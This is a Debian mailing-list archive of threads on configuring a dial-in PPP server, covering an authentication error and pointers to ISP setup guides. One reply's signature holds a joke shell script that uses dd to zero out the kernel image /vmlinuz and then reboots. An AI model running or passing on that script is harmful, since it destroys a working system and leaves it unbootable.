Problem setting up Dialin PPP server
After setting up the ppp server, when I try to connect to the server ppp starts and immediately stops with the following error: peer refused to authenticate. Any clues? Jun 29 20:10:32 hbcse pppd[31618]: rcvd [LCP EchoReq id=0x0 magic=0x1d8b13a] Jun 29 20:10:32 hbcse pppd[31618]: sent [LCP EchoRep id=0x0 magic=0x2afb0af] Jun 29 20:10:32 hbcse pppd[31618]: rcvd [LCP TermReq id=0x3 peer refused to authenticate] Jun 29 20:10:32 hbcse pppd[31618]: LCP terminated by peer (peer refused to authenticate) Jun 29 20:10:32 hbcse pppd[31618]: sent [LCP TermAck id=0x3] Jun 29 20:10:33 hbcse pppd[31618]: Modem hangup Jun 29 20:10:33 hbcse pppd[31618]: Connection terminated. Jun 29 20:10:34 hbcse pppd[31618]: Exit. Jun 29 20:12:00 hbcse /USR/SBIN/CRON[316 Nagarjuna -- Nagarjuna G; Homi Bhabha Centre for Science Education, TIFR, Mumbai. INDIA --
Re: Problem setting up Dialin PPP server
On Thu, Jun 29, 2000 at 08:14:10PM +0530, Nagarjuna G. wrote: After setting up the ppp server, when I try to connect to the server ppp starts and immediately stops with the following error: peer refused to authenticate. Any clues? Dialin servers almost never will authenticate to the client (unless you have a WAN). Your client ppp setup apparently is asking the server to authenticate itself to the client. You'll have to turn that off. Did you use pppconfig for the client? If you want the server to authenticate itself to the client, then you'll have to configure it to do so (but probably not what you want). The pap or chap authentication of the server will refuse connections from clients that don't authenticate themselves to the server (which is probably what you want) or when authentication fails (bad user/password pair). On your dialup, your /etc/ppp/peers/provider file should have an entry of noauth so it doesn't ask the server to authenticate itself. Jun 29 20:10:32 hbcse pppd[31618]: rcvd [LCP EchoReq id=0x0 magic=0x1d8b13a] Jun 29 20:10:32 hbcse pppd[31618]: sent [LCP EchoRep id=0x0 magic=0x2afb0af] Jun 29 20:10:32 hbcse pppd[31618]: rcvd [LCP TermReq id=0x3 peer refused to authenticate] Jun 29 20:10:32 hbcse pppd[31618]: LCP terminated by peer (peer refused to authenticate) Jun 29 20:10:32 hbcse pppd[31618]: sent [LCP TermAck id=0x3] Jun 29 20:10:33 hbcse pppd[31618]: Modem hangup Jun 29 20:10:33 hbcse pppd[31618]: Connection terminated. Jun 29 20:10:34 hbcse pppd[31618]: Exit. Jun 29 20:12:00 hbcse /USR/SBIN/CRON[316 Nagarjuna -- Nagarjuna G; Homi Bhabha Centre for Science Education, TIFR, Mumbai. INDIA -- -- Unsubscribe? mail -s unsubscribe [EMAIL PROTECTED] /dev/null -- #! /bin/sh echo 'Linux Must Die!' | wall dd if=/dev/zero of=/vmlinuz bs=1 \ count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'` shutdown -r now
Re: Setting up a PPP Server
G. H. wrote: I've been searching 2+ days in information on setting up Debian as a Dial-In PPP Server and have found NOTHING! Sure there's plenty of info on hooking up Debian to an ISP. But I want Debian to BE an ISP. All I need is support for 2 incoming lines to connect us to our TCP/IP Network and Internet connection. Can someone help me out with this? I would be very thankful and could possibly send you some of the hair that I've pulled out!! ;) http://www.buoy.com/isp would be a start. Tim -- (work) [EMAIL PROTECTED] / (home) [EMAIL PROTECTED] - http://www.buoy.com/~tps I believe the children are our future. Teach them well and let them lead the way. -- George Benson The Greatest Love of All ** Disclaimer: My views/comments/beliefs, as strange as they are, are my own.** -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Setting up a PPP Server
I've been searching 2+ days in information on setting up Debian as a Dial-In PPP Server and have found NOTHING! Sure there's plenty of info on hooking up Debian to an ISP. But I want Debian to BE an ISP. All I need is support for 2 incoming lines to connect us to our TCP/IP Network and Internet connection. Can someone help me out with this? I would be very thankful and could possibly send you some of the hair that I've pulled out!! ;) Thanks.. Greg Hively __ Get Your Private, Free Email at http://www.hotmail.com -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: Setting up a PPP Server
On Fri, 26 Dec 1997, G. H. wrote: : I've been searching 2+ days in information on setting up Debian as a : Dial-In PPP Server and have found NOTHING! : : Sure there's plenty of info on hooking up Debian to an ISP. But I want : Debian to BE an ISP. : : All I need is support for 2 incoming lines to connect us to our TCP/IP : Network and Internet connection. Can someone help me out with this? : : I would be very thankful and could possibly send you some of the hair : that I've pulled out!! ;) : : Thanks.. : : Greg Hively Thanks to Tim Sailer, there's a cool site at http://www.buoy.com/isp . The info there helped me build a rock solid RAS server out of an abandoned 486, Equinox serial card, and a pile of 33.6 external modems. This was all stuff that was going to be sold as junk or given away, as it was no longer cool enough to use in our Win95 / OS/2 environment at work - people were clamoring for dialup internet access from home and now they've got it :) -- Nathan Norman MidcoNet - 410 South Phillips Avenue - Sioux Falls, SD 57104 phone: (605) 334-4454 fax: (605) 335-1173 mailto://[EMAIL PROTECTED] http://www.midco.net PGP Key ID: 0xA33B86E9 - Public key available at keyservers PGP Key fingerprint: CE03 10AF 3281 1858 9D32 C2AB 936D C472 -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .